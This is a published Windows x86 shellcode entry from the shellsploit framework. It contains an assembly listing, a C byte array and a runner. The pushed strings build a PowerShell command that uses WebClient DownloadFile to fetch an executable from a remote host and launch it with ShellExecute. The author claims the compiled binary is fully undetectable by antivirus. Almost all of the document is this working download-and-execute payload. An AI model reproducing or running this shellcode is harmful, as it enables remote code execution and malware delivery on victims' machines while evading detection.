[+] Author : B3mB4m [~] Contact : b3mb4m@protonmail.com [~] Project : https://github.com/b3mb4m/shellsploit-framework [~] Greetz : Bomberman,T-Rex,Pixi ----------------------------------------------------------- Tested on : Windows XP/SP3 x86 Windows 7 Ultimate x64 Windows 8.1 Pro Build 9600 x64 Windows 10 Home x64 * This source belongs to shellsploit project under MIT licence. * If you convert it an executable file, its will be FUD(without any encrypt). -PoC : https://nodistribute.com/result/qwxU3DmFCR2M0OrQt 0x0: 31c9 xor ecx, ecx 0x2: b957696e45 mov ecx, 0x456e6957 0x7: eb04 jmp 0xd 0x9: 31c9 xor ecx, ecx 0xb: eb00 jmp 0xd 0xd: 31c0 xor eax, eax 0xf: 31db xor ebx, ebx 0x11: 31d2 xor edx, edx 0x13: 31ff xor edi, edi 0x15: 31f6 xor esi, esi 0x17: 648b7b30 mov edi, dword ptr fs:[ebx + 0x30] 0x1b: 8b7f0c mov edi, dword ptr [edi + 0xc] 0x1e: 8b7f1c mov edi, dword ptr [edi + 0x1c] 0x21: 8b4708 mov eax, dword ptr [edi + 8] 0x24: 8b7720 mov esi, dword ptr [edi + 0x20] 0x27: 8b3f mov edi, dword ptr [edi] 0x29: 807e0c33 cmp byte ptr [esi + 0xc], 0x33 0x2d: 75f2 jne 0x21 0x2f: 89c7 mov edi, eax 0x31: 03783c add edi, dword ptr [eax + 0x3c] 0x34: 8b5778 mov edx, dword ptr [edi + 0x78] 0x37: 01c2 add edx, eax 0x39: 8b7a20 mov edi, dword ptr [edx + 0x20] 0x3c: 01c7 add edi, eax 0x3e: 89dd mov ebp, ebx 0x40: 81f957696e45 cmp ecx, 0x456e6957 0x46: 0f8530010000 jne 0x17c 0x4c: 8b34af mov esi, dword ptr [edi + ebp*4] 0x4f: 01c6 add esi, eax 0x51: 45 inc ebp 0x52: 390e cmp dword ptr [esi], ecx 0x54: 75f6 jne 0x4c 0x56: 8b7a24 mov edi, dword ptr [edx + 0x24] 0x59: 01c7 add edi, eax 0x5b: 668b2c6f mov bp, word ptr [edi + ebp*2] 0x5f: 8b7a1c mov edi, dword ptr [edx + 0x1c] 0x62: 01c7 add edi, eax 0x64: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4] 0x68: 01c7 add edi, eax 0x6a: 89d9 mov ecx, ebx 0x6c: b1ff mov cl, 0xff 0x6e: 53 push ebx 0x6f: e2fd loop 0x6e 0x71: 68293b7d22 push 0x227d3b29 0x76: 6865786527 push 0x27657865 0x7b: 687474792e push 0x2e797474 0x80: 6828277075 push 0x75702728 0x85: 6863757465 push 0x65747563 0x8a: 686c457865 push 0x6578456c 0x8f: 685368656c push 0x6c656853 0x94: 686f6e292e push 0x2e296e6f 0x99: 6863617469 push 0x69746163 0x9e: 6870706c69 push 0x696c7070 0xa3: 686c6c2e41 push 0x412e6c6c 0xa8: 6820536865 push 0x65685320 0xad: 682d636f6d push 0x6d6f632d 0xb2: 6865637420 push 0x20746365 0xb7: 682d4f626a push 0x6a624f2d 0xbc: 68284e6577 push 0x77654e28 0xc1: 682729203b push 0x3b202927 0xc6: 682e657865 push 0x6578652e 0xcb: 6875747479 push 0x79747475 0xd0: 682c202770 push 0x7027202c 0xd5: 6865786527 push 0x27657865 0xda: 687474792e push 0x2e797474 0xdf: 68362f7075 push 0x75702f36 0xe4: 68742f7838 push 0x38782f74 0xe9: 6861746573 push 0x73657461 0xee: 6874792f6c push 0x6c2f7974 0xf3: 682f707574 push 0x7475702f 0xf8: 687468616d push 0x6d616874 0xfd: 6873677461 push 0x61746773 0x102: 686c692f7e push 0x7e2f696c 0x107: 687274682e push 0x2e687472 0x10c: 68652e6561 push 0x61652e65 0x111: 682f2f7468 push 0x68742f2f 0x116: 687470733a push 0x3a737074 0x11b: 6828276874 push 0x74682728 0x120: 6846696c65 push 0x656c6946 0x125: 686c6f6164 push 0x64616f6c 0x12a: 68446f776e push 0x6e776f44 0x12f: 686e74292e push 0x2e29746e 0x134: 68436c6965 push 0x65696c43 0x139: 682e576562 push 0x6265572e 0x13e: 68204e6574 push 0x74654e20 0x143: 686a656374 push 0x7463656a 0x148: 68772d4f62 push 0x624f2d77 0x14d: 6820284e65 push 0x654e2820 0x152: 682226207b push 0x7b202622 0x157: 68616e6420 push 0x20646e61 0x15c: 68636f6d6d push 0x6d6d6f63 0x161: 686c6c202d push 0x2d206c6c 0x166: 6872736865 push 0x65687372 0x16b: 68706f7765 push 0x65776f70 0x170: 89e2 mov edx, esp 0x172: 41 inc ecx 0x173: 51 push ecx 0x174: 52 push edx 0x175: ffd7 call edi 0x177: e88dfeffff call 9 0x17c: 8b34af mov esi, dword ptr [edi + ebp*4] 0x17f: 01c6 add esi, eax 0x181: 45 inc ebp 0x182: 813e45786974 cmp dword ptr [esi], 0x74697845 0x188: 75f2 jne 0x17c 0x18a: 817e0450726f63 cmp dword ptr [esi + 4], 0x636f7250 0x191: 75e9 jne 0x17c 0x193: 8b7a24 mov edi, dword ptr [edx + 0x24] 0x196: 01c7 add edi, eax 0x198: 668b2c6f mov bp, word ptr [edi + ebp*2] 0x19c: 8b7a1c mov edi, dword ptr [edx + 0x1c] 0x19f: 01c7 add edi, eax 0x1a1: 8b7caffc mov edi, dword ptr [edi + ebp*4 - 4] 0x1a5: 01c7 add edi, eax 0x1a7: 31c9 xor ecx, ecx 0x1a9: 51 push ecx 0x1aa: ffd7 call edi #include char shellcode[]=\ "\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x29\x3b\x7d\x22\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x28\x27\x70\x75\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x68\x6f\x6e\x29\x2e\x68\x63\x61\x74\x69\x68\x70\x70\x6c\x69\x68\x6c\x6c\x2e\x41\x68\x20\x53\x68\x65\x68\x2d\x63\x6f\x6d\x68\x65\x63\x74\x20\x68\x2d\x4f\x62\x6a\x68\x28\x4e\x65\x77\x68\x27\x29\x20\x3b\x68\x2e\x65\x78\x65\x68\x75\x74\x74\x79\x68\x2c\x20\x27\x70\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x36\x2f\x70\x75\x68\x74\x2f\x78\x38\x68\x61\x74\x65\x73\x68\x74\x79\x2f\x6c\x68\x2f\x70\x75\x74\x68\x74\x68\x61\x6d\x68\x73\x67\x74\x61\x68\x6c\x69\x2f\x7e\x68\x72\x74\x68\x2e\x68\x65\x2e\x65\x61\x68\x2f\x2f\x74\x68\x68\x74\x70\x73\x3a\x68\x28\x27\x68\x74\x68\x46\x69\x6c\x65\x68\x6c\x6f\x61\x64\x68\x44\x6f\x77\x6e\x68\x6e\x74\x29\x2e\x68\x43\x6c\x69\x65\x68\x2e\x57\x65\x62\x68\x20\x4e\x65\x74\x68\x6a\x65\x63\x74\x68\x77\x2d\x4f\x62\x68\x20\x28\x4e\x65\x68\x22\x26\x20\x7b\x68\x61\x6e\x64\x20\x68\x63\x6f\x6d\x6d\x68\x6c\x6c\x20\x2d\x68\x72\x73\x68\x65\x68\x70\x6f\x77\x65\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7"; main(){(* (int(*)()) shellcode)();}